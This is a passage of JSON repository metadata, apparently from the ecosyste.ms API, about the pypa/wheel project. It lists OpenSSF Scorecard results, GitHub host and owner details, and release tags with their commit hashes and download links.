fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","publ